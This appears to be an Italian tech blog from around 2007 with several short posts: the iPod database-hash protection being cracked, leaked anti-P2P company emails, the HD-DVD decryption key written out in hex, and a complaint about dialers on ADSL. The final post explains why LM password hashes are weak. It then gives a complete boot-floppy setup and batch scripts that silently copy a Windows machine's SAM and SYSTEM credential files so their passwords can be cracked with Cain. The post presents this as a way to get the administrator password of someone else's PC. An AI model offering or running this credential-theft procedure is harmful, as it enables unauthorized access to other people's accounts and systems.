Già crackata la protezione dei nuovi iPod

Tre giorni fa scrivevo un articolo sulla nuova protezione di Apple per i suoi iPod, ebbene la protezione è stata crackata dopo solo 48 ore, come riporta ipodminusitunes.

L’hash veniva calcolato usando i dati di iTunesDB, di un id univoco (firewireid) , e altri numeri “segreti”.

Qui le istruzioni per aggirare la protezione su Linux.

Trafugate 7000 email Anti-P2P

Da un paio di giorni gira in rete un .torrent di un archivio di 7000 email di una nota organizzazione anti P2P (MediaDefender) raccolte in 9 mesi di lavoro, a partire dall’inizio del 2007.

Le email contengono informazioni riservate, indirizzi ip dei server, tattiche, tecniche, nomi e numeri di telefono, indirizzi e password di server ftp, e quant’altro.

Arrivano anche nuove conferme riguardo al caso MiiVi, un sito civetta usato per raccogliere gli IP degli utenti.

Il tutto è stato possibile grazie al fatto che tutte le email venivano forwardate ad un account gMail con una password decisamente…. “sicura”.

Via Punto-Informatico

iPod (non più) su Linux

Stavo giusto per scrivere un articolo su come gestire un iPod da Linux, quando ho letto la notizia di una protezione sui nuovi iPod.

Sembra che iTunes scriva degli hash calcolati a partire dal database delle canzoni, per prevenirne le modifiche.

Se il controllo dell’hash fallisce, l’iPod si comporta come se non ci fosse nessuna canzone.

Al momento si sta cercando qualche modo per ovviare a questo problema, trovate maggiori informazioni qui.

In ogni caso per gestire l’iPod da Linux, finchè possibile, consiglio gtkpod.

A proposito di iPod e Linux, segnalo due progetti interessanti.

iPodLinux – Fai girare Linux sul tuo iPod.
Linux4Nano – Progetto per “liberare” gli iPod Nano di seconda generazione.

WPA con wifi-radar e wpa_supplicant

Cercando di connettermi a una rete WPA con l’applet per NetworkManager (nm-applet, installata di default su Ubuntu) mi sono reso conto che, seppur funzionante, mi da qualche problema nel connettersi a reti non protette e ha la brutta abitudine di volersi sempre connettere a qualche rete se il wireless è abilitato (mentre a volte si potrebbe voler osservare le reti wireless senza connettersi).

Ho optato perciò per wifi-radar, ecco come fare (l’esempio è per una rete WPA-PSK):

Leggi il seguito di questo post »

09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0

Ecco la chiave per decifrare i contenuti degli HD-DVD.

La notizia si è rapidamente diffusa su digg fino a quando la RIAA non ha pensato bene di diffidare dal pubblicare la chiave, in quanto ritenuta come sua proprietà intellettuale.

Il fatto ha suscitato clamore tra i netizen che hanno deciso che la chiave non verrà rimossa.
Così mentre digg, rimuoveva i link ai post incriminati, se ne aprivano di nuovi sui blog di tutto il mondo.

Anche digg, ha fatto marcia indietro, accogliendo le proteste e pubblicando questo.

“…We hear you, and effective immediately we won’t delete stories or comments containing the code and will deal with whatever the consequences might be.

If we lose, then what the hell, at least we died trying.”.

Dialer e ADSL

“Gli utenti con una connessione ADSL o su linea dedicata [...] non sono soggetti alla minaccia dei dialer.” (Wikipedia) … o almeno finora.

Quante volte un’amico, sentendo qualche notizia riguardo a dialer e bollette gonfiate, vi ha chiesto se se anche lui, con la sua ADSL, fosse a rischio? E quante volte lo avete tranquillizzato, spiegandogli che, in ogni caso, sarebbe impossibile per il dialer comporre un numero telefonico su una linea dati?

Chi si ricorda il boom dei dialer di qualche anno fa, diminuito gradualmente con la diffusione delle connessioni broadband?

Ora qualcuno ha deciso che se si poteva pagare con una connessione 56k, allora si deve poter pagare anche con un’ADSL: a partire dal 2 aprile sarà possibile ricevere Servizi a Valore Aggiunto (VAS) anche via ADSL.

<< Ora infatti i VAS possono “essere tariffati, ovvero fatti pagare, sulla base dell’indirizzo IP del fornitore del servizio stesso” >> (Punto Informatico).

Cioè in base all’indirizzo di destinazione delle mie connessioni, il mio provider dovrebbe stabilire se, e quanto, io debba pagare?

Ma sopratutto, a chi interessano servizi a valore aggiunto via ADSL? La maggior parte degli utenti confonde Internet con il Web, o peggio ancora con il noto browser di casa Microsoft, siamo sicuri che vogliano questi nuovi VAS?

Se qualcuno volesse usufruire di questi VAS, non andrebbero più che bene gli attuali metodi di pagamento? Chi ci guadagnerà?

Certamente i provider avranno la loro parte sul “traffico” generato da queste connessioni, e avranno quindi tutto da guadagnarci dalla nasciata di nuovi dialer.

E se il provider decidesse di negare l’accesso a servizi di terzi per favorire la sua nuova vantaggiosissima offerta (a pagamento)? Se pago per la connettività ADSL, voglio poter connettermi a qualunque porta di qualunque indirizzo ip, e inviare qualsiasi sequenza di pacchetti senza spendere un centesimo di più.

Al massimo me la vedrò con il destinatario di tali pacchetti.

Inutile dire che questi nuovi servizi “devono essere forniti in modo trasparente”…
chi si ricorda le scritte semi-invisibili, dello stesso colore dello sfondo e a fondo pagina dei siti con dialer? Magari sovrastati da ernormi scritte del tipo: “CLICCA SI”.
E questo quando, sfruttando le vulnerabilità del browser (uno su tutti), non fosse sufficiente visitare la pagina incriminata.

Aspettiamo di avere maggiori informazioni… ma, nel frattempo, come si disattivano questi VAS?

Via Punto-Informatico

LM / NTLM Passwords

Le password degli utenti, nei sistemi NT, sono memorizzati nel file “%systemroot%\system32\config\SAM“, che contine informazioni riguardo:

• L’username
• L’user ID associato
• La password
• Eventuali commenti

La password è memorizzata sotto forma di hash in due differenti formati: LM e NTLM.

L’hash LM (LAN Manager hash) viene mantenuto solo per compatibilità con i precedenti sistemi ed è particolarmente insicuro a causa del procedimento con cui viene calcolato:

1. La password dell’utente viene convertita in MAIUSCOLO.
2. La password viene troncata o riempita di byte nulli per raggiungere esattamente 14 caratteri.
3. La password viene quindi divisa in due segmenti da 7 caratteri l’uno.
4. Ognuno di questi segmenti viene usato per criptare la stringa “KGS!@#$%“.
5. I risultati ottenuti (ognuno di 8 byte) vengono concatenati per formare l’hash LM di 16 bytes.

Con 14 caratteri si possono formare 2⁸⁴ diverse combinazioni, ma dato che la password è divisa in due segmenti queste scendono a 2⁴²+ 2⁴² .
Inoltre la password viene convertita in maiuscolo riducendo le combinazioni possibili per ogni segmento a 2³⁶.

2⁸⁴ = 19342813113834066795298816
2⁴³ = 8796093022208
2³⁷ = 137438953472

Queste 137438953472 combinazioni possono essere facilmente provate in poche ore con un attacco di tipo bruteforce.
Inoltre se la password ha meno di 8 caratteri, il secondo segmento sarà composto da 8 byte nulli e darà origine sempre allo stesso hash rendendo possibile sapere immediatamente se una password è composta da più o meno di 7 caratteri.

Come ho detto prima, gli hash LM sono stati superati dagli hash NTLM ed è possibile disabilitarli settando la chiave "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash" a “1“.

Il file SAM è protetto dal processo LSASS, infatti i vari tool disponibili in rete richiedono i privilegi di amministratore per poter agire su questo processo… Ma se stiamo cercando la password di amministratore??

Inoltre, SYSKEY, un utility introdotta da MS, provvede a criptare ulteriormente gli hash (usando una chiave memorizzata nel registro) e perciò può succedere che i dati ottenuti con vari tool non siano veritieri.

Ci sono vari modi per ottenere gli hash delle password, ad esempio usando delle distro live di linux, ma non sempre si ha la possibilità di poter smanettare sul pc che ci interessa

Una soluzione potrebbe essere quella di copiare il file SAM e il file SYSTEM (dove è memorizzata la SYSKEY) e poi crackarli con calma su un altro pc.

Per fare questo è sufficiente:

• Un floppy
• Un OS per rendere avviabile il floppy, ad esempio FreeDOS (ma va bene anche un floppy di avvio di windows)
• NTFSDOS per accedere alle partizioni NTFS da DOS (va benissimo la versione free).
• GZip per comprimere i files

Apriamo un prompt dos, andiamo nella cartella dove sono contenuti i file di FreeDOS (“F:\freedos\setup\odin” nel mio caso) e scriviamo:

sys a:

Copiamo il file himem.exe dalla cartella al floppy.
Copiamo i file fdapm.exe e choice.exe nel floppy (non obbligatorio).
Copiamo NTFSDOS e GZIP nel floppy.

Creiamo un file di nome config.sys con le seguenti linee:

DEVICE=A:HIMEM.EXE
DOS=HIGH,UMB
lastdrive=z

Creiamo un batch (getsam.bat) che faccia la copia dei file per noi

if not x==%1x goto setdrive
set drive=C
goto check

:setdrive
set drive=%1
goto check

:check
if exist %drive%:/windows/system32/config/sam goto win
if exist %drive%:/winnt/system32/config/sam goto winnt
goto end

:win
set windir=%drive%:/windows
goto docopy

:winnt
set windir=%drive%:/winnt
goto docopy

:docopy
if not x==%2x if not exist %2 mkdir %2
gzip -9 -c %windir%/system32/config/sam > %2/sam.gz
gzip -9 -c %windir%/system32/config/system > %2/system.gz

:end
set drive=
set windir=

Ed eseguiamolo mettendo questo nel file autoexex.bat:

@echo off
choice /C:PS /T:P,10 /N *** Press S to skip AutoExec.bat, wait 10 seconds or press P to process... ***
if ERRORLEVEL 2 GOTO exit

@echo on
ntfsdos
call getsam D files

@echo off
choice /C:HC /T:H,10 /N *** Press C to continue working, wait 10 seconds or press H to halt now... ***
if ERRORLEVEL 2 GOTO exit

@echo on
fdapm POWEROFF

:exit

Questo file fa uso di choice.exe per scegliere se continuare ad eseguire le istruzioni e se arrestare il sistema o meno e di fdapm.exe per il poweroff, modificando le linee relative potete rimuovere questi file dal floppy e risparmiare spazio.

Alla linea

"call getsam D files"

chiamiamo il batch creato prima dicendo di cercare i file in D: (dove viene montata la prima partizione ntfs con NTFSDOS Free), di comprimerli e di copiarli nella cartella files sul floppy. Quindi viene chiamato fdapm.exe per spegnere il PC.

E’ possibile che lo spazio non basti dal momento che il file SYSTEM, seppur compresso può essere troppo grosso per lo spazio rimanente sul floppy. Consiglio quindi di usare un altro floppy con solo GZIP.

Ci siamo… ora basta decriptare la SYSKEY usando uno dei tanti tool (ad esempio con Cain da Tools / Syskey Decoder), ottenere gli hash delle password (sempre con Cain, cliccando col tasto destro sulla scheda Cracker e scegliendo “Add to List”) e crackarli .

In circa 6 ore avremo la nostra password .